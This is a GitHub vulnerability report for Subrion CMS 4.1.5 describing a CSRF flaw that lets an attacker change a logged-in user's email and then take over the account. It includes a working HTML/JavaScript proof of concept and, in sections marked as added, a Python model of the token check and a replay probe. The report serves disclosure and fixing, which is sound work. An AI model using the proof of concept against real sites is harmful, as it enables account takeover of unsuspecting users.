CSRF Account Take Over Possible #570

Closed
9emin1 opened this issue Oct 15, 2017 · 2 comments


9emin1 commented Oct 15, 2017

Affected Software

Subrion Open Source CMS
https://subrion.org
https://github.com/intelliants/subrion

Version Tested
4.1.5 - Latest Stable version June 26, 2017
https://subrion.org/download/

Environment Tested
Ubuntu 16.04
PHP 7.0



Vulnerability and Impact

Vulnerability:
Cross-Site Request Forgery (CSRF) attack on profile update

Impact:
Account Take Over
Changing the password requires knowledge of the current password; this
prevents a simplified account takeover.

It is still possible to perform an account takeover through a CSRF attack, as
it is possible to change the user's email without knowing the current password.

By changing the email, the attacker is able to perform an account reset :)



Vulnerability Description:

It was discovered that state-changing requests, such as the profile update:

POST /profile/

contain a parameter __st that holds a unique value to act as CSRF prevention.

However, this value is not validated on the server side, and thus it is possible
to perform a CSRF attack.



Steps to Reproduce:

Craft a .html file that contains the CSRF attack POST request.
Please change http://172.16.6.167 to your own hosted IP address.
The value of fullname does not matter; the important parameter here is email.
Please note that for demonstration purposes, clicking on "Submit request" is
required. A real attack does not require the victim to click any buttons, as
it is possible to auto-submit the POST request when the page is loaded.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/172.16.6.167\/profile\/", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------426022850688199453496807880");
        xhr.withCredentials = true;
        var body = "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"__st\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"fullname\"\r\n" + 
          "\r\n" + 
          "HackedBy9emin1\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"email\"\r\n" + 
          "\r\n" + 
          "sec.9emin1@gmail.com\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"avatar[title]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"avatar[path]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"avatar[file]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"avatar[size]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"avatar[]\"; filename=\"\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"website\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"phone\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"biography\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"facebook\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"twitter\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"gplus\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"linkedin\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"change_info\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"current\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"new\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"confirm\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
  1. Authenticate into Subrion CMS. Browse to your profile page.
  2. On another tab, visit this crafted .html and click Submit Request
  3. Refresh your profile page and your email will be hijacked

Refer to the screenshot attached. The entire __st is removed and the state-
changing request to update the profile still works.
[screenshot: csrf-attack]


Recommendation:

Validate the CSRF token.
Consider requiring the current password when changing the email.

https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
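
The following is an added example, not Subrion's PHP code and not from the report: a Python model of what the server side of a `__st`-style state token should do, placed next to the behaviour the report describes. handle_profile_update() with verify_token=False and reauth_for_email=False behaves as the report says 4.1.5 did (the form carries `__st`, the server never compares it, and the email can be changed without the password); the defaults model the two recommendations above. The session, form and user records are constructed here; the field names `__st`, `fullname`, `email` and `current` are the ones in the PoC, and the PBKDF2 hashing is a stand-in, not what Subrion uses.

```python
"""Added example, not Subrion code and not from the report: a model of the
server side of a `__st`-style state token.  handle_profile_update() with
verify_token=False and reauth_for_email=False behaves as the report describes
4.1.5 (the form carries `__st`, the server never compares it, and the email
can be changed without the password); the defaults model the two
recommendations.  Session, form and user records are constructed here; the
field names `__st`, `fullname`, `email` and `current` are the PoC's."""
import hashlib
import hmac
import secrets


def issue_state_token(session: dict) -> str:
    """Create the per-session anti-CSRF token once and reuse it; the profile
    form embeds it as the hidden `__st` field."""
    if "__st" not in session:
        session["__st"] = secrets.token_urlsafe(32)
    return session["__st"]


def state_token_is_valid(session: dict, form: dict) -> bool:
    """Constant-time comparison of the submitted `__st` with the session copy.
    A missing or empty field fails closed; the PoC sends `__st` empty."""
    expected = session.get("__st")
    submitted = form.get("__st")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode())


def hash_password(password: str, salt: bytes) -> bytes:
    """PBKDF2-SHA256 stand-in for whatever hash the application stores."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_user(fullname: str, email: str, password: str) -> dict:
    salt = secrets.token_bytes(16)
    return {"fullname": fullname, "email": email, "salt": salt,
            "pw_hash": hash_password(password, salt)}


def password_matches(user: dict, candidate: str) -> bool:
    return hmac.compare_digest(user["pw_hash"],
                               hash_password(candidate, user["salt"]))


def handle_profile_update(session: dict, form: dict, user: dict, *,
                          verify_token: bool = True,
                          reauth_for_email: bool = True) -> dict:
    """Apply a profile update; returns {"ok", "reason", "user"} with the
    (possibly updated) user record.  Both flags off = the reported behaviour."""
    if verify_token and not state_token_is_valid(session, form):
        return {"ok": False, "reason": "invalid or missing __st", "user": dict(user)}
    updated = dict(user)
    new_email = form.get("email")
    if new_email and new_email != user["email"]:
        # Email is the password-reset channel, so re-authenticate before
        # changing it (the report's second recommendation).
        if reauth_for_email and not password_matches(user, form.get("current", "")):
            return {"ok": False, "reason": "current password required to change email",
                    "user": updated}
        updated["email"] = new_email
    if form.get("fullname"):
        updated["fullname"] = form["fullname"]
    return {"ok": True, "reason": "updated", "user": updated}


def replay_poc() -> dict:
    """Send the PoC's essential fields (empty `__st`, new email, no password)
    through the vulnerable model and the fixed model, plus a legitimate
    submission carrying the right token and the current password."""
    victim = make_user("Victim", "victim@example.com", "correct horse")
    session = {}
    token = issue_state_token(session)
    poc_form = {"__st": "", "fullname": "HackedBy9emin1",
                "email": "attacker@example.com"}
    vulnerable = handle_profile_update(session, poc_form, victim,
                                       verify_token=False, reauth_for_email=False)
    fixed = handle_profile_update(session, poc_form, victim)
    # Right token but no password: the token check passes, re-auth still
    # blocks the email change.
    token_only = handle_profile_update(session, dict(poc_form, __st=token), victim)
    legit = handle_profile_update(
        session, {"__st": token, "email": "new@example.com", "current": "correct horse"},
        victim)
    return {"vulnerable": vulnerable, "fixed": fixed, "token_only": token_only,
            "legit": legit}


if __name__ == "__main__":
    for name, result in replay_poc().items():
        print(f"{name:10s} ok={result['ok']!s:5s} "
              f"email={result['user']['email']}  ({result['reason']})")
```

Running the block prints the four outcomes: the vulnerable model accepts the PoC form and ends with the attacker's email, the fixed model refuses it on the empty `__st`, a valid token without the password is refused by the re-authentication step, and only the submission with both succeeds. The empty-token case matters because an attacker's page can always include the field name; what it cannot do is read the victim's session value, so the check must fail closed on a missing or empty value rather than only on a mismatch.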


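Also added, and not part of the report: a small probe that replays the minimal form of the PoC request (`__st` sent empty, plus `fullname` and `email`) against your own test instance, authenticated only by the session cookie a cross-site request would carry, so you can check after upgrading whether the token is actually enforced. The `/profile/` path and the field names are from the report; the multipart boundary, the example values and the `probe.py` name are constructed here. It does not interpret Subrion's response (the HTML is not in the report): reload the profile page and see whether the email changed, as step 3 of the report does.

```python
"""Added example, not part of the report: replay the minimal PoC request
(`__st` empty, `fullname`, `email`) against a test instance using only the
session cookie, and report what the server answered.  Path and field names
are from the report; boundary and sample values are constructed here."""
import sys
import urllib.error
import urllib.request
from email import policy
from email.parser import BytesParser

BOUNDARY = "csrfProbeBoundary7f3a"  # any token that cannot occur in a field value


def build_multipart(fields: dict, boundary: str = BOUNDARY) -> bytes:
    """Encode `fields` as multipart/form-data the way the PoC's body is laid
    out: one text part per field, CRLF line endings, closing delimiter last."""
    lines = []
    for name, value in fields.items():
        lines += [f"--{boundary}",
                  f'Content-Disposition: form-data; name="{name}"',
                  "",
                  value]
    lines += [f"--{boundary}--", ""]
    return "\r\n".join(lines).encode()


def parse_multipart(body: bytes, boundary: str = BOUNDARY) -> dict:
    """Decode a multipart/form-data body back to {name: value}; used to
    self-check the encoder offline (a server-side parser does the same)."""
    headers = (f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
               "MIME-Version: 1.0\r\n\r\n").encode()
    msg = BytesParser(policy=policy.default).parsebytes(headers + body)
    return {part.get_param("name", header="content-disposition"):
            part.get_payload(decode=True).decode()
            for part in msg.iter_parts()}


def probe_profile_update(base_url: str, cookie: str, new_email: str,
                         fullname: str = "csrf-probe", timeout: float = 10.0) -> dict:
    """POST the profile update with an EMPTY `__st`.  A server that validates
    the token should refuse; returns the status and the first bytes of the body."""
    body = build_multipart({"__st": "", "fullname": fullname, "email": new_email})
    req = urllib.request.Request(
        base_url.rstrip("/") + "/profile/", data=body, method="POST",
        headers={"Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
                 "Cookie": cookie})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return {"status": resp.status, "body_head": resp.read(200)}
    except urllib.error.HTTPError as err:
        return {"status": err.code, "body_head": err.read(200)}


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit("usage: probe.py http://HOST 'COOKIE-HEADER-VALUE' NEW-EMAIL")
    print(probe_profile_update(*sys.argv[1:4]))
```

Run it only against an instance you own, with the Cookie header value copied from a logged-in browser session. A status alone does not prove the outcome either way, which is why the report's own check (reloading /profile/) is the one to rely on; the probe just makes the request reproducible without Burp.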

@vbezruchkin vbezruchkin added this to the 4.2.0 milestone Oct 16, 2017
@vbezruchkin vbezruchkin assigned ghost Oct 16, 2017

ghost commented Oct 16, 2017

Hello @9emin1,

Many thanks for your report.

We had several requests on this issue and have already fixed it. Please refer to the following commit: 5fdf03a

Appreciate your efforts!

@ghost ghost closed this as completed Oct 16, 2017
vbezruchkin (Member) commented

Just a minor addition to the issue:
We will release a new version this week

Appropriate auto patch will be released for 4.1.x version.

Thanks
